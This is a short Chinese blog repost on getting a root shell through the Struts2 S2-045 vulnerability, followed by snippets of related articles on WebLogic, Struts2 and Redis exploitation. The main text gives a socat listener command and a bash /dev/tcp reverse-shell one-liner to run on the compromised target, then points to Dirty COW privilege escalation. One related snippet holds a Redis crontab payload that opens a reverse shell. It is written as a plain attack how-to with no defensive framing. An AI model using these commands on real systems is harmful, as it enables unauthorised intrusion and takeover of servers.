st2045 漏洞反弹root shell

最新推荐文章于 2023-03-23 13:36:54 发布
最新推荐文章于 2023-03-23 13:36:54 发布
阅读量287 收藏
点赞数
文章标签: shell python
原文链接:https://my.oschina.net/phybrain/blog/1556452
版权

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

通过strust2 045漏洞,拿到root命令执行权限。 在自己服务器上,安装socat,监听端口如

socat TCP-LISTEN:8337 readline

在目标服务器上执行 

bash -i>& /dev/tcp/自己的ip/8337 0>&1

可在自己服务器上看到反弹的root shell,可以执行命令,查看端口情况。

查看linux版本,找内核漏洞

脏牛提权,

 

转载于:https://my.oschina.net/phybrain/blog/1556452

weixin_34007291
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
第16篇:Weblogic 2019-2729反序列化漏洞绕防护拿权限的实战过程
ABC_123的博客
06-27 1966
Part1前言大家好,我是ABC_123。前两期分享了《第14篇:Struts2框架下Log4j2漏洞检测方法分析与总结》、《第15篇:内网横向中windows各端口远程登录哈希传递的方法总结》,本期讲解一个Weblogic拿权限案例。最近安服的同事打比赛,给我陆续发了好几个没有拿下来的Weblogic的站点,一直在想尽各种办法研究,争取拿下权限。各种WAF防护、终...
主机提权篇_命令劫持&&环境变量修改
shelter1234567的博客
06-30 724
SUID提权环境变量劫持命令拼接。
【weblogic漏洞复现】CVE-2017-10271+CVE-2020-14882远程命令执行漏洞+CVE-2018-2894任意文件上传漏洞+CVE-2018-2628反序列化远程代码执行漏洞
serendipity1130的博客
09-01 3617
1.CVE-2017-10271 漏洞成因: 由WebLogicServerWLS组件远程命令执行漏洞,主要由wls-wsat.war触发该漏洞 触发漏洞url如下: http://192.168.225.139:7001/wls-wsat/CoordinatorPortType post数据包,通过构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞。 1.扫描到端口号为:7001,进行访问。 nmap192.168.225.138-sV-sC-P
struts2漏洞_学生会私房菜【20200723期】S2045 Remote Code Execution漏洞利用
weixin_39932300的博客
11-29 525
学生会私房菜学生会私房菜是通过学生会信箱收集同学们的来稿,挑选其中的优质文档,不定期进行文档推送的主题。本期文档内容为:《S2-045 Remote Code Execution漏洞利用》作者介绍:Fhawkz福建师范大学18级学生,国科学生会安全团队的一员,本人对技术喜欢进行钻研,平时也爱鼓捣一些安全的相关技术,本次分享是自己在日常学习中有用到的一些技术,希望给大家带来一些安全学习上的...
s2-045漏洞分析
热门推荐
Exploit的小站~
05-10 1万+
这个分析写的我有点汗颜,强烈建议抵制struts2,改为更加可靠的SpringMVC。 背景是,Struts2默认处理multipart报文的解析器是jakarta,是这个组件出现了问题。 该组件定义在了struts-default.xml中,因此,只要不修改parser,并且版本在受影响范围内,肯定是有问题的。 令我非常疑惑的是,一个content-type怎么就能用ognl解析...
RootShell.jar
10-21
github:https://github.com/Stericson/RootShell
tsu:在 Termux 上获得 root shell
05-29
津在 Termux 上获得 root shell,同时能够以 root 身份运行 Termux 命令。 或者使用来自普通 linux 发行版的众所周知的sudo运行一次性命令。 tsu A su interface wrapper for Termux Usage: tsu tsu [ -s SHELL ] [-...
oppoR11ST无root 改全网通
05-09
将该软件安装在手机上,根据提示解锁后,删除该软件重启。移动全网通就变成真正的全网通了
基于利用方式的Android Root漏洞分析
03-24
Android平台恶意软件可以使用获取系统root权限的方式来绕过传统的Android安全机制,并且由于Android碎片化现象的存在,出现了很多利用方式、范围不同的Android root漏洞,因此有必要详细了解这些漏洞的实现机制,以采取...
RootShell-201708
12-31
"RootShell-201708"是一个针对ONT(Optical Network Terminal,光网络终端)设备的配置工具的更新补全包。ONT是FTTH(Fiber To The Home,光纤到户)网络中用于用户端接入的重要组件,它接收来自光分配网络的光信号...
靶机渗透练习37-Corrosion2
hirak0的博客
04-18 966
靶机描述 靶机地址:https://www.vulnhub.com/entry/corrosion-2,745/ Description Difficulty: Medium Hint: Enumeration is key. 一、搭建靶机环境 攻击机Kali: IP地址:192.168.184.128 靶机: IP地址:192.168.184.147 注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式) 二、实战 2.1网络扫描 2.1.1 启动靶机和K
漏洞复现 - - -Struts2(s2-045)远程命令执行漏洞
weixin_67503304的博客
08-22 7398
从源码的角度分析Struts2(s2-045)远程命令执行漏洞,利用java详细讲解造成漏洞的原因,包含了Structs2高危漏洞exp的扫描利用工具
str2-045漏洞事件,你想要的这里都有
chengman3837的博客
03-09 203
话说昨天一觉醒来,发现整个安全圈被一个名为str2-045的漏洞霸屏了,好多小伙伴已经开始了喜刷刷的艰苦奋斗过程。然而对于很多小白童鞋来讲,他们可能还是处于懵逼的状态,别急,咱们专门为你们做了一期专题,来告诉你这到底是咋回事! 这个漏洞的全名啊,叫做:基于Jakarta插件的插件的Str...
利用Weblogic中间件存在的SSRF漏洞结合redis未授权访问漏洞GetShell
wenqingshuo321的博客
10-11 773
在Search Public Registries,选择Public Registry中的 IBM,同时勾选Search by business name,开启bp进行抓包,点击search。set 1 "\n\n\n\n * * * * * root bash -i >& /dev/tcp/{本地物理机ip}/1234 0>&1\n\n\n\n"给redis服务器发送三条命令,将其写入redis的容器里里面的/etc/crontab,从而将shell反弹到本地物理机ip的1234端口。
Weblogic 常见漏洞分析与利用
未完成的歌~的博客
03-23 8711
一直没有系统的总结过 weblogic 的漏洞,今天通过 vulhub 靶场来复现几个经典的案例。WebLogic 是美国 Oracle 公司出品的一个基于 JAVAEE 架构的中间件,是用于开发、集成、部署和管理大型分布式 Web 应用、网络应用和数据库应用的Java应用服务器。WebLogic 由纯 Java 开发,长期以来一直被认为是市场上最好的J2EE工具之一,被广泛应用于开发、部署和运行 Java 应用等适用于本地环境和云环境的企业应用。
WebLogic反序列化远程命令执行(CNVD-C-2019-48814)
weixin_51151498的博客
12-07 832
WebLogic反序列化远程命令执行(CNVD-C-2019-48814)
Weblogic漏洞 - 通杀方式
HAKUNAMATATATTA的博客
12-09 1008
此方式对于所有Weblogic版本均有效,最早在 CVE-2019-2725 被提出。构造一个XML文件,并将其保存在Weblogic可以访问到的服务器上,如 http://example.com/rce.xml通过 bash-c touch 命令写入 success3 的恶意 .xml文件。
Struts2远程代码执行漏洞S2-045利用及修复
u014416842的博客
04-13 4178
升级到struts-2.3.32, 发现无法调用getter方法public class Action { private Map yTypeList = new LinkedHashMap(); // getYtypeList public Map getYTypeList() { yTypeList.put("a", "invalid yTypeList a");
vulhub-Struts2-045(CVE-2017-5638)漏洞复现
m0_62008601的博客
07-31 1686
struts2重要漏洞之一
shrio反弹shell
最新发布
08-12
Shiro反弹shell是一种安全漏洞,利用该漏洞可以实现在目标系统上执行恶意代码并获取系统访问权限。根据引用和引用提供的信息,可以使用Shiro_exploit工具来利用此漏洞进行反弹shell攻击。首先,需要使用Burp Suite抓...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值